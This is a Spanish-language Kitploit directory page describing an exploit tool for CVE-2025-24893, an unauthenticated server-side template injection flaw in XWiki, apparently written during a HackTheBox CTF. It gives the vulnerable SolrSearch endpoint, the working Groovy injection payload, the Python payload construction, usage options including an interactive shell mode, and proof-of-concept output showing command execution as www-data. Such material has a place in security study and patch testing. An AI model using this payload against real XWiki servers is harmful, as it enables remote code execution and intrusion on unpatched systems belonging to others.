Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893-XWiki-SSTI-RCE — CVE-2025-24893 – Exploit de RCE no autenticado por SSTI en XWiki (HackTheBox CTF) | Kitploit
Herramientas/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de Penetración
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – Exploit de RCE no autenticado por SSTI en XWiki (HackTheBox CTF)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
2hace 4 mesesAún no revisado
Compartir

CVE-2025-24893 — XWiki SSTI Ejecución remota de código

Resumen

CampoDetalles
CVECVE-2025-24893
SoftwareXWiki
VulnerabilidadInyección de plantillas del lado del servidor (SSTI) → RCE
AutenticaciónNo requerida
Puntuación CVSSCrítico
ContextoDescubierto durante la CTF de HackTheBox

Descripción

XWiki expone un endpoint SolrSearch (/xwiki/bin/get/Main/SolrSearch) que procesa la entrada proporcionada por el usuario mediante el motor de plantillas Groovy sin saneamiento. Un atacante no autenticado puede inyectar una expresión Groovy a través del parámetro de consulta text, logrando ejecución remota de código en el servidor subyacente.

Detalles técnicos

Endpoint vulnerable

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

Mecanismo de inyección

El parámetro text se incrusta directamente en un contexto de macro de XWiki y es evaluado por el motor Groovy. La inyección escapa del contexto de la plantilla usando }}} y abre un bloque {{async}}{{groovy}}:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

La salida se refleja en el cuerpo de la respuesta RSS y puede extraerse mediante expresiones regulares.

Estructura del payload

root@kitploit:~
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

La respuesta es XML/RSS: la salida del comando aparece entre los marcadores [}}} y ]</ con caracteres codificados en HTML.

Uso

root@kitploit:~
python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]
OpciónDescripción
-tHostname o IP del objetivo
-pPuerto (por defecto: 80)
-sUsar HTTPS
-iModo shell interactivo
-cEjecución de un solo comando
-vSalida detallada

Ejemplos

root@kitploit:~
# Single command
python3 exploit.py -t wiki.target.htb -c "id"

# Interactive shell
python3 exploit.py -t wiki.target.htb -i

# HTTPS on custom port
python3 exploit.py -t wiki.target.htb -p 443 -s -i

Dependencias

root@kitploit:~
pip install requests termcolor

Prueba de concepto

root@kitploit:~
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Referencias

  • Aviso oficial de XWiki
  • Entrada de NVD
Descargar herramienta